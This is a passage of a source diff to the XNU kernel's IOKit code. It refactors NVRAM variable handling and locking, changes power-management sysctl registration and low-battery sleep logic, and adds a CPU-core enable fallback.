- switch (getVariableType(variableName)) { + switch (getVariableType(name)) { case kOFVariableTypeBoolean: propObject = OSDynamicPtrCast(sharedObject); break; @@ -1291,9 +1373,9 @@ IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject) if (propObject != nullptr) { propDataSize = (OSDynamicPtrCast(propObject))->getLength(); - if (aKey->isEqualTo(kIONVRAMBootArgsKey) && (propDataSize >= BOOT_LINE_LENGTH)) { + if ((strncmp(name, kIONVRAMBootArgsKey, sizeof(kIONVRAMBootArgsKey)) == 0) && (propDataSize >= BOOT_LINE_LENGTH)) { DEBUG_ERROR("boot-args size too large for BOOT_LINE_LENGTH, propDataSize=%zu\n", propDataSize); - result = kIOReturnNoSpace; + ret = kIOReturnNoSpace; goto exit; } } @@ -1325,18 +1407,18 @@ IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject) if (propObject == nullptr) { DEBUG_INFO("No property object\n"); - result = kIOReturnBadArgument; + ret = kIOReturnBadArgument; goto exit; } - if (!verifyWriteSizeLimit(&varGuid, variableName, propDataSize)) { - DEBUG_ERROR("Property data size of %zu too long for %s\n", propDataSize, variableName); - result = kIOReturnNoSpace; + if (!verifyWriteSizeLimit(guid, name, propDataSize)) { + DEBUG_ERROR("Property data size of %zu too long for %s\n", propDataSize, name); + ret = kIOReturnNoSpace; goto exit; } - NVRAMLOCK(); - ok = handleSpecialVariables(variableName, &varGuid, propObject.get(), &result); + NVRAMWRITELOCK(); + ok = handleSpecialVariables(name, guid, propObject.get(), &ret); NVRAMUNLOCK(); if (ok) { @@ -1344,39 +1426,42 @@ IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject) goto exit; } - NVRAMLOCK(); - oldObject.reset(dict->getObject(variableName), OSRetain); + NVRAMREADLOCK(); + oldObject.reset(dict->getObject(name), OSRetain); + NVRAMUNLOCK(); + if (remove == false) { DEBUG_INFO("Adding object\n"); - if (!dict->setObject(variableName, propObject.get())) { - result = kIOReturnBadArgument; + NVRAMWRITELOCK(); + if (!dict->setObject(name, 
propObject.get())) { + ret = kIOReturnBadArgument; } + NVRAMUNLOCK(); } else { DEBUG_INFO("Removing object\n"); // Check for existence so we can decide whether we need to sync variables if (oldObject) { - result = removePropertyInternal(aKey); + ret = removePropertyWithGUIDAndName(guid, name); } else { - result = kIOReturnNotFound; + ret = kIOReturnNotFound; } } - NVRAMUNLOCK(); - if (result == kIOReturnSuccess) { - result = serializeVariables(); - if (result != kIOReturnSuccess) { - DEBUG_ERROR("serializeVariables failed, result=0x%08x\n", result); + if (ret == kIOReturnSuccess) { + ret = serializeVariables(); + if (ret != kIOReturnSuccess) { + DEBUG_ERROR("serializeVariables failed, ret=%#08x\n", ret); - NVRAMLOCK(); + NVRAMWRITELOCK(); if (oldObject) { - dict->setObject(variableName, oldObject.get()); + dict->setObject(name, oldObject.get()); } else { - dict->removeObject(variableName); + dict->removeObject(name); } NVRAMUNLOCK(); (void) serializeVariables(); - result = kIOReturnNoMemory; + ret = kIOReturnNoMemory; } } @@ -1388,9 +1473,22 @@ IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject) } exit: - DEBUG_INFO("result=0x%08x\n", result); + DEBUG_INFO("ret=%#08x\n", ret); - return result; + return ret; +} + +IOReturn +IODTNVRAM::setPropertyInternal(const OSSymbol *aKey, OSObject *anObject) +{ + const char *variableName; + uuid_t varGuid; + + DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy()); + + parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName); + + return setPropertyWithGUIDAndName(&varGuid, variableName, anObject); } bool @@ -1404,55 +1502,77 @@ IODTNVRAM::removeProperty(const OSSymbol *aKey) { IOReturn ret; - NVRAMLOCK(); ret = removePropertyInternal(aKey); - NVRAMUNLOCK(); if (ret == kIOReturnSuccess) { serializeVariables(); } else { - DEBUG_INFO("removePropertyInternal failed, ret=0x%08x\n", ret); + DEBUG_INFO("removePropertyInternal failed, ret=%#08x\n", ret); } } IOReturn -IODTNVRAM::removePropertyInternal(const 
OSSymbol *aKey) +IODTNVRAM::removePropertyWithGUIDAndName(const uuid_t *guid, const char *name) { - IOReturn result; - const char *variableName; - uuid_t varGuid; + IOReturn ret; OSDictionary *dict; + bool removed = false; - DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy()); - - NVRAMLOCKASSERT(); - - parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName); + DEBUG_INFO("name=%s\n", name); - result = chooseDictionary(kIONVRAMOperationDelete, &varGuid, variableName, &dict); - if (result != kIOReturnSuccess) { + ret = chooseDictionary(kIONVRAMOperationDelete, guid, name, &dict); + if (ret != kIOReturnSuccess) { + DEBUG_INFO("No dictionary\n"); goto exit; } - if (!verifyPermission(kIONVRAMOperationDelete, &varGuid, variableName)) { + if (!verifyPermission(kIONVRAMOperationDelete, guid, name)) { DEBUG_INFO("Not priveleged\n"); - result = kIOReturnNotPrivileged; + ret = kIOReturnNotPrivileged; goto exit; } + NVRAMWRITELOCK(); + // If the object exists, remove it from the dictionary. 
- if (dict->getObject(variableName) != nullptr) { - dict->removeObject(variableName); + if (dict->getObject(name) != nullptr) { + dict->removeObject(name); + removed = true; + } else { + DEBUG_INFO("%s not found\n", name); + } + + NVRAMUNLOCK(); + + if (removed) { + ret = serializeVariables(); + DEBUG_INFO("serializeVariables ret=0x%08x\n", ret); } exit: - return result; + return ret; +} + +IOReturn +IODTNVRAM::removePropertyInternal(const OSSymbol *aKey) +{ + IOReturn ret; + const char *variableName; + uuid_t varGuid; + + DEBUG_INFO("aKey=%s\n", aKey->getCStringNoCopy()); + + parseVariableName(aKey->getCStringNoCopy(), &varGuid, &variableName); + + ret = removePropertyWithGUIDAndName(&varGuid, variableName); + + return ret; } IOReturn IODTNVRAM::setProperties(OSObject *properties) { - IOReturn result = kIOReturnSuccess; + IOReturn ret = kIOReturnSuccess; OSObject *object; const OSSymbol *key; OSDictionary *dict; @@ -1470,7 +1590,7 @@ IODTNVRAM::setProperties(OSObject *properties) return kIOReturnBadArgument; } - while (result == kIOReturnSuccess) { + while (ret == kIOReturnSuccess) { key = OSDynamicCast(OSSymbol, iter->getNextObject()); if (key == nullptr) { break; @@ -1481,12 +1601,12 @@ IODTNVRAM::setProperties(OSObject *properties) continue; } - result = setPropertyInternal(key, object); + ret = setPropertyInternal(key, object); } - DEBUG_INFO("result=0x%08x\n", result); + DEBUG_INFO("ret=%#08x\n", ret); - return result; + return ret; } IOReturn @@ -1634,8 +1754,8 @@ IODTNVRAM::initVariables(void) OSSharedPtr propSymbol; OSSharedPtr propObject; NVRAMRegionInfo *currentRegion; - NVRAMRegionInfo variableRegions[] = { { NVRAM_CHRP_PARTITION_NAME_COMMON, _commonPartitionOffset, _commonPartitionSize, _commonDict, _commonImage}, - { NVRAM_CHRP_PARTITION_NAME_SYSTEM, _systemPartitionOffset, _systemPartitionSize, _systemDict, _systemImage} }; + NVRAMRegionInfo variableRegions[] = { { kIONVRAMPartitionCommon, _commonPartitionOffset, _commonPartitionSize, _commonDict, 
_commonImage}, + { kIONVRAMPartitionSystem, _systemPartitionOffset, _systemPartitionSize, _systemDict, _systemImage} }; DEBUG_INFO("...\n"); @@ -1648,7 +1768,7 @@ IODTNVRAM::initVariables(void) currentRegion->dict = OSDictionary::withCapacity(1); - DEBUG_INFO("region = %s\n", currentRegion->name); + DEBUG_INFO("region = %d\n", currentRegion->type); cnt = 0; while (cnt < currentRegion->size) { // Break if there is no name. @@ -1695,14 +1815,23 @@ IODTNVRAM::initVariables(void) } // Create the boot-args property if it is not in the dictionary. - if (_commonDict->getObject(kIONVRAMBootArgsKey) == nullptr) { - propObject = OSString::withCStringNoCopy(""); - if (propObject != nullptr) { - _commonDict->setObject(kIONVRAMBootArgsKey, propObject.get()); + if (_systemDict != nullptr) { + if (_systemDict->getObject(kIONVRAMBootArgsKey) == nullptr) { + propObject = OSString::withCStringNoCopy(""); + if (propObject != nullptr) { + _systemDict->setObject(kIONVRAMBootArgsKey, propObject.get()); + } + } + } else if (_commonDict != nullptr) { + if (_commonDict->getObject(kIONVRAMBootArgsKey) == nullptr) { + propObject = OSString::withCStringNoCopy(""); + if (propObject != nullptr) { + _commonDict->setObject(kIONVRAMBootArgsKey, propObject.get()); + } } } - DEBUG_INFO("%s _commonDict=%p _systemDict=%p\n", __FUNCTION__, _commonDict.get(), _systemDict.get()); + DEBUG_INFO("%s _commonDict=%p _systemDict=%p\n", __FUNCTION__, _commonDict ? _commonDict.get() : nullptr, _systemDict ? 
_systemDict.get() : nullptr); return kIOReturnSuccess; } @@ -1728,8 +1857,8 @@ IODTNVRAM::serializeVariables(void) UInt32 commonUsed = 0; OSSharedPtr nvramImage; NVRAMRegionInfo *currentRegion; - NVRAMRegionInfo variableRegions[] = { { NVRAM_CHRP_PARTITION_NAME_COMMON, _commonPartitionOffset, _commonPartitionSize, _commonDict, _commonImage}, - { NVRAM_CHRP_PARTITION_NAME_SYSTEM, _systemPartitionOffset, _systemPartitionSize, _systemDict, _systemImage} }; + NVRAMRegionInfo variableRegions[] = { { kIONVRAMPartitionCommon, _commonPartitionOffset, _commonPartitionSize, _commonDict, _commonImage}, + { kIONVRAMPartitionSystem, _systemPartitionOffset, _systemPartitionSize, _systemDict, _systemImage} }; if (_systemPanicked) { return kIOReturnNotReady; @@ -1742,7 +1871,7 @@ IODTNVRAM::serializeVariables(void) DEBUG_INFO("...\n"); - NVRAMLOCK(); + NVRAMREADLOCK(); for (regionIndex = 0; regionIndex < ARRAY_SIZE(variableRegions); regionIndex++) { currentRegion = &variableRegions[regionIndex]; @@ -1751,10 +1880,12 @@ IODTNVRAM::serializeVariables(void) continue; } - DEBUG_INFO("region = %s\n", currentRegion->name); + DEBUG_INFO("region = %d\n", currentRegion->type); buffer = tmpBuffer = IONew(UInt8, currentRegion->size); if (buffer == nullptr) { - return kIOReturnNoMemory; + ok = false; + ret = kIOReturnNoMemory; + break; } bzero(buffer, currentRegion->size); @@ -1790,44 +1921,48 @@ IODTNVRAM::serializeVariables(void) IODelete(buffer, UInt8, currentRegion->size); - if ((strncmp(currentRegion->name, NVRAM_CHRP_PARTITION_NAME_SYSTEM, strlen(NVRAM_CHRP_PARTITION_NAME_SYSTEM)) == 0) && + if ((currentRegion->type == kIONVRAMPartitionSystem) && (_systemService != nullptr)) { - _systemService->setProperties(_systemDict.get()); - systemUsed = maxLength; - } else if ((strncmp(currentRegion->name, NVRAM_CHRP_PARTITION_NAME_COMMON, strlen(NVRAM_CHRP_PARTITION_NAME_COMMON)) == 0) && + _systemService->setVariables(_systemDict.get()); + systemUsed = (uint32_t)(tmpBuffer - buffer); + } else if 
((currentRegion->type == kIONVRAMPartitionCommon) && (_commonService != nullptr)) { - _commonService->setProperties(_commonDict.get()); - commonUsed = maxLength; + _commonService->setVariables(_commonDict.get()); + commonUsed = (uint32_t)(tmpBuffer - buffer); } if (!ok) { - return kIOReturnBadArgument; + ret = kIOReturnBadArgument; + break; } } - nvramImage = OSData::withBytes(_nvramImage, _nvramSize); - NVRAMUNLOCK(); DEBUG_INFO("ok=%d\n", ok); - CONTROLLERLOCK(); + if (ok) { + nvramImage = OSData::withBytes(_nvramImage, _nvramSize); + CONTROLLERLOCK(); - if (_systemService) { - sizeUsed = OSNumber::withNumber(systemUsed, 32); - _nvramController->setProperty("SystemUsed", sizeUsed.get()); - sizeUsed.reset(); - } + if (_systemService) { + sizeUsed = OSNumber::withNumber(systemUsed, 32); + _nvramController->setProperty("SystemUsed", sizeUsed.get()); + DEBUG_INFO("SystemUsed=%u\n", (unsigned int)commonUsed); + sizeUsed.reset(); + } - if (_commonService) { - sizeUsed = OSNumber::withNumber(commonUsed, 32); - _nvramController->setProperty("CommonUsed", sizeUsed.get()); - sizeUsed.reset(); - } + if (_commonService) { + sizeUsed = OSNumber::withNumber(commonUsed, 32); + _nvramController->setProperty("CommonUsed", sizeUsed.get()); + DEBUG_INFO("CommonUsed=%u\n", (unsigned int)commonUsed); + sizeUsed.reset(); + } - ret = _nvramController->write(0, (uint8_t *)nvramImage->getBytesNoCopy(), nvramImage->getLength()); + ret = _nvramController->write(0, (uint8_t *)nvramImage->getBytesNoCopy(), nvramImage->getLength()); - CONTROLLERUNLOCK(); + CONTROLLERUNLOCK(); + } return ret; } @@ -1932,11 +2067,11 @@ IODTNVRAM::convertPropToObject(UInt8 *propName, UInt32 propNameLength, { const OSSymbol* propSymbolRaw = nullptr; OSObject* propObjectRaw = nullptr; - bool result = convertPropToObject(propName, propNameLength, propData, propDataLength, + bool ok = convertPropToObject(propName, propNameLength, propData, propDataLength, &propSymbolRaw, &propObjectRaw); 
propSymbol.reset(propSymbolRaw, OSNoRetain); propObject.reset(propObjectRaw, OSNoRetain); - return result; + return ok; } bool @@ -2020,7 +2155,7 @@ IODTNVRAM::convertObjectToProp(UInt8 *buffer, UInt32 *length, } else if (tmpValue < 1000) { snprintf((char *)buffer, remaining, "%d", (uint32_t)tmpValue); } else { - snprintf((char *)buffer, remaining, "0x%x", (uint32_t)tmpValue); + snprintf((char *)buffer, remaining, "%#x", (uint32_t)tmpValue); } } break; @@ -2226,7 +2361,7 @@ IODTNVRAM::readNVRAMPropertyType1(IORegistryEntry *entry, UInt32 resultValueLen = 0; UInt8 byte; - NVRAMLOCK(); + NVRAMREADLOCK(); data = OSDynamicCast(OSData, _commonDict->getObject(_registryPropertiesKey.get())); NVRAMUNLOCK(); @@ -2300,7 +2435,7 @@ IODTNVRAM::writeNVRAMPropertyType1(IORegistryEntry *entry, // copy over existing properties for other entries - NVRAMLOCK(); + NVRAMWRITELOCK(); oldData.reset(OSDynamicCast(OSData, _commonDict->getObject(_registryPropertiesKey.get())), OSRetain); if (oldData) { @@ -2403,7 +2538,7 @@ IODTNVRAM::writeNVRAMPropertyType1(IORegistryEntry *entry, if (ok) { if (serializeVariables() != kIOReturnSuccess) { - NVRAMLOCK(); + NVRAMWRITELOCK(); if (oldData) { _commonDict->setObject(_registryPropertiesKey.get(), oldData.get()); } else { diff --git a/iokit/Kernel/IOPMGR.cpp b/iokit/Kernel/IOPMGR.cpp index 4fd29c336..48c09e324 100644 --- a/iokit/Kernel/IOPMGR.cpp +++ b/iokit/Kernel/IOPMGR.cpp @@ -30,3 +30,17 @@ #define super IOService OSDefineMetaClassAndAbstractStructors(IOPMGR, IOService); + +void +IOPMGR::enableCPUCore(unsigned int cpu_id, uint64_t entry_pa) +{ + // Fall back to the legacy method if the subclass doesn't override the + // new method. 
+ enableCPUCore(cpu_id); +} + +void +IOPMGR::enableCPUCore(unsigned int cpu_id) +{ + panic("enableCPUCore is unimplemented"); +} diff --git a/iokit/Kernel/IOPMrootDomain.cpp b/iokit/Kernel/IOPMrootDomain.cpp index ed78c3d76..4231fad39 100644 --- a/iokit/Kernel/IOPMrootDomain.cpp +++ b/iokit/Kernel/IOPMrootDomain.cpp @@ -54,6 +54,7 @@ #include #include #include +#include #include "IOKitKernelInternal.h" #if HIBERNATION #include @@ -519,8 +520,8 @@ static UInt32 gWillShutdown = 0; static UInt32 gPagingOff = 0; static UInt32 gSleepWakeUUIDIsSet = false; static uint32_t gAggressivesState = 0; -static uint32_t gHaltTimeMaxLog; -static uint32_t gHaltTimeMaxPanic; +uint32_t gHaltTimeMaxLog; +uint32_t gHaltTimeMaxPanic; IOLock * gHaltLogLock; static char * gHaltLog; enum { kHaltLogSize = 2048 }; @@ -605,6 +606,7 @@ static char gShutdownReasonString[80]; static bool gWakeReasonSysctlRegistered = false; static bool gBootReasonSysctlRegistered = false; static bool gShutdownReasonSysctlRegistered = false; +static bool gWillShutdownSysctlRegistered = false; static AbsoluteTime gUserActiveAbsTime; static AbsoluteTime gUserInactiveAbsTime; @@ -977,6 +979,18 @@ IOSystemShutdownNotification(int stage) return; } + if (kIOSystemShutdownNotificationTerminateDEXTs == stage) { + uint64_t nano, millis; + startTime = mach_absolute_time(); + IOServicePH::systemHalt(); + absolutetime_to_nanoseconds(mach_absolute_time() - startTime, &nano); + millis = nano / NSEC_PER_MSEC; + if (true || (gHaltTimeMaxLog && (millis >= gHaltTimeMaxLog))) { + printf("IOServicePH::systemHalt took %qd ms\n", millis); + } + return; + } + assert(kIOSystemShutdownNotificationStageProcessExit == stage); IOLockLock(gHaltLogLock); @@ -1002,7 +1016,6 @@ IOSystemShutdownNotification(int stage) } } - extern "C" int sync_internal(void); /* @@ -1171,11 +1184,11 @@ sysctl_sleepwaketime SYSCTL_HANDLER_ARGS } static SYSCTL_PROC(_kern, OID_AUTO, sleeptime, - CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | 
CTLFLAG_LOCKED, + CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED, &gIOLastUserSleepTime, 0, sysctl_sleepwaketime, "S,timeval", ""); static SYSCTL_PROC(_kern, OID_AUTO, waketime, - CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED, &gIOLastWakeTime, 0, sysctl_sleepwaketime, "S,timeval", ""); SYSCTL_QUAD(_kern, OID_AUTO, wake_abs_time, CTLFLAG_RD | CTLFLAG_LOCKED, &gIOLastWakeAbsTime, ""); @@ -1184,11 +1197,15 @@ SYSCTL_QUAD(_kern, OID_AUTO, useractive_abs_time, CTLFLAG_RD | CTLFLAG_LOCKED, & SYSCTL_QUAD(_kern, OID_AUTO, userinactive_abs_time, CTLFLAG_RD | CTLFLAG_LOCKED, &gUserInactiveAbsTime, ""); static int -sysctl_willshutdown -(__unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req) +sysctl_willshutdown SYSCTL_HANDLER_ARGS { - int new_value, changed; - int error = sysctl_io_number(req, gWillShutdown, sizeof(int), &new_value, &changed); + int new_value, changed, error; + + if (!gWillShutdownSysctlRegistered) { + return ENOENT; + } + + error = sysctl_io_number(req, gWillShutdown, sizeof(int), &new_value, &changed); if (changed) { if (!gWillShutdown && (new_value == 1)) { IOPMRootDomainWillShutdown(); @@ -1200,12 +1217,9 @@ sysctl_willshutdown } static SYSCTL_PROC(_kern, OID_AUTO, willshutdown, - CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, 0, sysctl_willshutdown, "I", ""); -extern struct sysctl_oid sysctl__kern_iokittest; -extern struct sysctl_oid sysctl__debug_iokit; - #if defined(XNU_TARGET_OS_OSX) static int @@ -1241,11 +1255,11 @@ sysctl_progressmeter } static SYSCTL_PROC(_kern, OID_AUTO, progressmeterenable, - CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, 0, sysctl_progressmeterenable, "I", ""); static SYSCTL_PROC(_kern, 
OID_AUTO, progressmeter, - CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, 0, sysctl_progressmeter, "I", ""); #endif /* defined(XNU_TARGET_OS_OSX) */ @@ -1269,7 +1283,7 @@ sysctl_consoleoptions } static SYSCTL_PROC(_kern, OID_AUTO, consoleoptions, - CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, 0, sysctl_consoleoptions, "I", ""); @@ -1280,7 +1294,7 @@ sysctl_progressoptions SYSCTL_HANDLER_ARGS } static SYSCTL_PROC(_kern, OID_AUTO, progressoptions, - CTLTYPE_STRUCT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY, + CTLTYPE_STRUCT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY, NULL, 0, sysctl_progressoptions, "S,vc_progress_user_options", ""); @@ -1290,20 +1304,32 @@ sysctl_wakereason SYSCTL_HANDLER_ARGS char wr[sizeof(gWakeReasonString)]; wr[0] = '\0'; - if (gRootDomain) { + if (gRootDomain && gWakeReasonSysctlRegistered) { gRootDomain->copyWakeReasonString(wr, sizeof(wr)); + } else { + return ENOENT; } return sysctl_io_string(req, wr, 0, 0, NULL); } SYSCTL_PROC(_kern, OID_AUTO, wakereason, - CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, 0, sysctl_wakereason, "A", "wakereason"); -SYSCTL_STRING(_kern, OID_AUTO, bootreason, - CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, - gBootReasonString, sizeof(gBootReasonString), ""); +static int +sysctl_bootreason SYSCTL_HANDLER_ARGS +{ + if (!os_atomic_load(&gBootReasonSysctlRegistered, acquire)) { + return ENOENT; + } + + return sysctl_io_string(req, gBootReasonString, 0, 0, NULL); +} + +SYSCTL_PROC(_kern, OID_AUTO, bootreason, + CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED, + NULL, 0, sysctl_bootreason, "A", ""); static int sysctl_shutdownreason SYSCTL_HANDLER_ARGS @@ -1311,15 
+1337,17 @@ sysctl_shutdownreason SYSCTL_HANDLER_ARGS char sr[sizeof(gShutdownReasonString)]; sr[0] = '\0'; - if (gRootDomain) { + if (gRootDomain && gShutdownReasonSysctlRegistered) { gRootDomain->copyShutdownReasonString(sr, sizeof(sr)); + } else { + return ENOENT; } return sysctl_io_string(req, sr, 0, 0, NULL); } SYSCTL_PROC(_kern, OID_AUTO, shutdownreason, - CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, 0, sysctl_shutdownreason, "A", "shutdownreason"); static int @@ -1341,7 +1369,7 @@ sysctl_targettype SYSCTL_HANDLER_ARGS } SYSCTL_PROC(_hw, OID_AUTO, targettype, - CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, 0, sysctl_targettype, "A", "targettype"); static SYSCTL_INT(_debug, OID_AUTO, noidle, CTLFLAG_RW, &gNoIdleFlag, 0, ""); @@ -1373,7 +1401,7 @@ sysctl_aotmetrics SYSCTL_HANDLER_ARGS } static SYSCTL_PROC(_kern, OID_AUTO, aotmetrics, - CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY, + CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY, NULL, 0, sysctl_aotmetrics, "S,IOPMAOTMetrics", ""); @@ -1422,7 +1450,7 @@ sysctl_aotmodebits } static SYSCTL_PROC(_kern, OID_AUTO, aotmodebits, - CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED, NULL, 0, sysctl_aotmodebits, "I", ""); static int @@ -1447,7 +1475,7 @@ sysctl_aotmode } static SYSCTL_PROC(_kern, OID_AUTO, aotmode, - CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY, + CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY, NULL, 0, sysctl_aotmode, "I", ""); //****************************************************************************** @@ -1748,24 +1776,7 @@ IOPMrootDomain::start( IOService * nub 
) // read swd_panic boot-arg PE_parse_boot_argn("swd_panic", &gSwdPanic, sizeof(gSwdPanic)); - sysctl_register_oid(&sysctl__kern_sleeptime); - sysctl_register_oid(&sysctl__kern_waketime); - sysctl_register_oid(&sysctl__kern_willshutdown); - sysctl_register_oid(&sysctl__kern_iokittest); - sysctl_register_oid(&sysctl__debug_iokit); - sysctl_register_oid(&sysctl__hw_targettype); - -#if defined(XNU_TARGET_OS_OSX) - sysctl_register_oid(&sysctl__kern_progressmeterenable); - sysctl_register_oid(&sysctl__kern_progressmeter); - sysctl_register_oid(&sysctl__kern_wakereason); -#endif /* defined(XNU_TARGET_OS_OSX) */ - sysctl_register_oid(&sysctl__kern_consoleoptions); - sysctl_register_oid(&sysctl__kern_progressoptions); - - sysctl_register_oid(&sysctl__kern_aotmode); - sysctl_register_oid(&sysctl__kern_aotmodebits); - sysctl_register_oid(&sysctl__kern_aotmetrics); + gWillShutdownSysctlRegistered = true; #if HIBERNATION #if defined(__arm64__) @@ -2971,6 +2982,9 @@ IOPMrootDomain::powerChangeDone( unsigned long previousPowerState ) // Until the platform driver can claim its wake reasons strlcat(gWakeReasonString, wakeReason->getCStringNoCopy(), sizeof(gWakeReasonString)); + if (!gWakeReasonSysctlRegistered) { + gWakeReasonSysctlRegistered = true; + } WAKEEVENT_UNLOCK(); } @@ -6002,6 +6016,27 @@ IOPMrootDomain::overrideOurPowerChange( _currentCapability, changeFlags, request->getTag()); + +#if defined(XNU_TARGET_OS_OSX) && !DISPLAY_WRANGLER_PRESENT + /* + * ASBM send lowBattery notifications every 1 second until the device + * enters hibernation. This queues up multiple sleep requests. + * After the device wakes from hibernation, none of these previously + * queued sleep requests are valid. + * lowBattteryCondition variable is set when ASBM notifies rootDomain + * and is cleared at the very last point in sleep. 
+ * Any attempt to sleep with reason kIOPMSleepReasonLowPower without + * lowBatteryCondition is invalid + */ + if (REQUEST_TAG_TO_REASON(request->getTag()) == kIOPMSleepReasonLowPower) { + if (!lowBatteryCondition) { + DLOG("Duplicate lowBattery sleep"); + *inOutChangeFlags |= kIOPMNotDone; + return; + } + } +#endif + if ((AOT_STATE == desiredPowerState) && (ON_STATE == currentPowerState)) { // Assertion may have been taken in AOT leading to changePowerStateTo(AOT) *inOutChangeFlags |= kIOPMNotDone; @@ -6015,15 +6050,6 @@ IOPMrootDomain::overrideOurPowerChange( return; } -#if defined(XNU_TARGET_OS_OSX) && !DISPLAY_WRANGLER_PRESENT - if (lowBatteryCondition && (desiredPowerState < currentPowerState)) { - // Reject sleep requests when lowBatteryCondition is TRUE to - // avoid racing with the impending system shutdown. - *inOutChangeFlags |= kIOPMNotDone; - return; - } -#endif - if (desiredPowerState < currentPowerState) { if (CAP_CURRENT(kIOPMSystemCapabilityGraphics)) { // Root domain is dropping power state from ON->SLEEP. @@ -8156,23 +8182,9 @@ IOPMrootDomain::handlePowerNotification( UInt32 msg ) * Power Emergency */ if (msg & kIOPMPowerEmergency) { - DLOG("Low battery notification received\n"); -#if defined(XNU_TARGET_OS_OSX) && !DISPLAY_WRANGLER_PRESENT - // Wait for the next low battery notification if the system state is - // in transition. 
- if ((_systemTransitionType == kSystemTransitionNone) && - CAP_CURRENT(kIOPMSystemCapabilityCPU) && - !systemBooting && !systemShutdown && !gWillShutdown) { - // Setting lowBatteryCondition will prevent system sleep - lowBatteryCondition = true; - - // Notify userspace to initiate system shutdown - messageClients(kIOPMMessageRequestSystemShutdown); - } -#else + DLOG("Received kIOPMPowerEmergency"); lowBatteryCondition = true; privateSleepSystem(kIOPMSleepReasonLowPower); -#endif } /* @@ -10692,9 +10704,6 @@ IOPMrootDomain::claimSystemWakeEvent( // Lazy registration until the platform driver stops registering // the same name. gWakeReasonSysctlRegistered = true; -#if !defined(XNU_TARGET_OS_OSX) - sysctl_register_oid(&sysctl__kern_wakereason); -#endif /* !defined(XNU_TARGET_OS_OSX) */ } if (addWakeReason) { _systemWakeEventsArray->setObject(dict.get()); @@ -10737,8 +10746,7 @@ IOPMrootDomain::claimSystemBootEvent( if (!gBootReasonSysctlRegistered) { // Lazy sysctl registration after setting gBootReasonString strlcat(gBootReasonString, reason, sizeof(gBootReasonString)); - sysctl_register_oid(&sysctl__kern_bootreason); - gBootReasonSysctlRegistered = true; + os_atomic_store(&gBootReasonSysctlRegistered, true, release); } WAKEEVENT_UNLOCK(); } @@ -10767,10 +10775,7 @@ IOPMrootDomain::claimSystemShutdownEvent( } strlcat(gShutdownReasonString, reason, sizeof(gShutdownReasonString)); - if (!gShutdownReasonSysctlRegistered) { - sysctl_register_oid(&sysctl__kern_shutdownreason); - gShutdownReasonSysctlRegistered = true; - } + gShutdownReasonSysctlRegistered = true; WAKEEVENT_UNLOCK(); } diff --git a/iokit/Kernel/IOPlatformExpert.cpp b/iokit/Kernel/IOPlatformExpert.cpp index 407dd5b02..3fdec62e4 100644 --- a/iokit/Kernel/IOPlatformExpert.cpp +++ b/iokit/Kernel/IOPlatformExpert.cpp @@ -1082,6 +1082,8 @@ PEHaltRestartInternal(unsigned int type, uint32_t details) IOCPURunPlatformPanicActions(type, details); } } + } else if (type == kPEPanicDiagnosticsDone) { + 
